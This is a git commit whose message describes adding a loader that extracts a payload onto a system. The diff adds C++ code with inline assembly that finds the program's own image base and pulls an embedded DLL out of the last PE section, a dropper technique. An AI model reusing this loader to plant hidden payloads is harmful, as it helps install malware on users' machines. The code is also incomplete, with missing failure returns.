Changed a lot of things. Addded a loader for extracting payload onto system

This commit is contained in:
hellisabove
2023-07-03 15:32:13 +03:00
parent 0969e96a55
commit 9f4a57720b
69 changed files with 406 additions and 63 deletions
+36
View File
@@ -0,0 +1,36 @@
#include "tools.h"
#include <Windows.h>
PVOID Tools::GetImageBase() {
PWORD virtual_address = PWORD(&GetImageBase);
PDWORD image_base = NULL;
__asm {
mov eax, virtual_address
and eax, 0xFFFF0000
IterateImage:
cmp WORD PTR[eax], 0x5A4D
je EndIteration
sub eax, 0x00010000
jmp IterateImage
EndIteration:
mov[image_base], eax
}
return image_base;
}
PBYTE Tools::ExtractDllFile(PBYTE module_base, PDWORD module_size) {
PIMAGE_DOS_HEADER image_dos_header = (PIMAGE_DOS_HEADER)(module_base);
if (image_dos_header->e_magic == IMAGE_DOS_SIGNATURE) {
PIMAGE_NT_HEADERS image_nt_headers = (PIMAGE_NT_HEADERS)(module_base + image_dos_header->e_lfanew);
if (image_nt_headers->Signature == IMAGE_NT_SIGNATURE) {
PIMAGE_SECTION_HEADER first_section = (PIMAGE_SECTION_HEADER)(IMAGE_FIRST_SECTION(image_nt_headers));
PIMAGE_SECTION_HEADER dll_section = (PIMAGE_SECTION_HEADER)(first_section + image_nt_headers->FileHeader.NumberOfSections - 1);
if (dll_section != ERROR) {
*module_size = dll_section->Misc.VirtualSize;
return RtlOffsetToPointer(module_base, dll_section->VirtualAddress);
}
}
}
}